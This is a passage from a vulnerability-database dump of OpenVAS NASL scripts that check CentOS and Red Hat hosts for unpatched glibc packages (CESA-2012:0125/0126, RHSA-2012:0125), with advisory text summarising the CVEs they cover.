glibc, could use this flaw to make that service use an excessive amount of\n CPU time. (CVE-2011-4609)\n \n Red Hat would like to thank the Ubuntu Security Team for reporting\n CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\n Security Team acknowledges Dan Rosenberg as the original reporter of\n CVE-2010-0830.\n \n Users should upgrade to these updated packages, which resolve these issues.\";\n\ntag_affected = \"glibc on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-February/018428.html\");\n script_id(881084);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:03:45 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0126\");\n script_name(\"CentOS Update for glibc CESA-2012:0126 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881084", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881084", "type": "openvas", "title": "CentOS Update for glibc CESA-2012:0126 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0126 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-February/018428.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881084\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:03:45 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0126\");\n script_name(\"CentOS Update for glibc CESA-2012:0126 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"glibc on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n A denial of service flaw was found in the remote procedure call (RPC)\n implementation in glibc. A remote attacker able to open a large number of\n connections to an RPC service that is using the RPC implementation from\n glibc, could use this flaw to make that service use an excessive amount of\n CPU time. (CVE-2011-4609)\n\n Red Hat would like to thank the Ubuntu Security Team for reporting\n CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\n Security Team acknowledges Dan Rosenberg as the original reporter of\n CVE-2010-0830.\n\n Users should upgrade to these updated packages, which resolve these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:57:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "Check for the Version of glibc", "modified": "2017-12-27T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881217", "href": "http://plugins.openvas.org/nasl.php?oid=881217", "type": "openvas", "title": "CentOS Update for glibc CESA-2012:0125 centos4 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0125 centos4 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n \n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n \n It was discovered that the glibc addmntent() function, used by various\n mount helper utilities, did not sanitize its input properly. A local\n attacker could possibly use this flaw to inject malformed lines into the\n mtab (mounted file systems table) file via certain setuid mount helpers, if\n the attacker were allowed to mount to an arbitrary directory under their\n control. (CVE-2010-0296)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n \n It was discovered that the glibc fnmatch() function did not properly\n restrict the use of alloca(). If the function was called on sufficiently\n large inputs, it could cause an application using fnmatch() to crash or,\n possibly, execute arbitrary code with the privileges of the application.\n (CVE-2011-1071)\n \n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n \n It was discovered that the locale command did not produce properly escaped\n output as required by the POSIX specification. If an attacker were able to\n set the locale environment variables in the environment of a script that\n performed shell evaluation on the output of the locale command, ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"glibc on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-February/018427.html\");\n script_id(881217);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:48:09 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\",\n \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0125\");\n script_name(\"CentOS Update for glibc CESA-2012:0125 centos4 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nptl-devel\", rpm:\"nptl-devel~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:58:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "Check for the Version of glibc", "modified": "2017-12-29T00:00:00", "published": "2012-02-21T00:00:00", "id": "OPENVAS:870545", "href": "http://plugins.openvas.org/nasl.php?oid=870545", "type": "openvas", "title": "RedHat Update for glibc RHSA-2012:0125-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0125-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n It was discovered that the glibc addmntent() function, used by various\n mount helper utilities, did not sanitize its input properly. A local\n attacker could possibly use this flaw to inject malformed lines into the\n mtab (mounted file systems table) file via certain setuid mount helpers, if\n the attacker were allowed to mount to an arbitrary directory under their\n control. (CVE-2010-0296)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was discovered that the glibc fnmatch() function did not properly\n restrict the use of alloca(). If the function was called on sufficiently\n large inputs, it could cause an application using fnmatch() to crash or,\n possibly, execute arbitrary code with the privileges of the application.\n (CVE-2011-1071)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n It was discovered that the locale command did not produce properly escaped\n output as required by the POSIX specification. If an attacker were able to\n set the locale environment ...\n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"glibc on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00026.html\");\n script_id(870545);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-21 18:55:19 +0530 (Tue, 21 Feb 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\",\n \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2012:0125-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0125-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nptl-devel\", rpm:\"nptl-devel~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-02-21T00:00:00", "id": "OPENVAS:1361412562310870545", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870545", "type": "openvas", "title": "RedHat Update for glibc RHSA-2012:0125-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0125-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00026.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870545\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-21 18:55:19 +0530 (Tue, 21 Feb 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\",\n \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2012:0125-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0125-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_4\");\n script_tag(name:\"affected\", value:\"glibc on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n It was discovered that the glibc addmntent() function, used by various\n mount helper utilities, did not sanitize its input properly. A local\n attacker could possibly use this flaw to inject malformed lines into the\n mtab (mounted file systems table) file via certain setuid mount helpers, if\n the attacker were allowed to mount to an arbitrary directory under their\n control. (CVE-2010-0296)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was discovered that the glibc fnmatch() function did not properly\n restrict the use of alloca(). If the function was called on sufficiently\n large inputs, it could cause an application using fnmatch() to crash or,\n possibly, execute arbitrary code with the privileges of the application.\n (CVE-2011-1071)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n It was discovered that the locale command did not produce properly escaped\n output as required by the POSIX specification. If an attacker were able to\n set the locale environment ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", 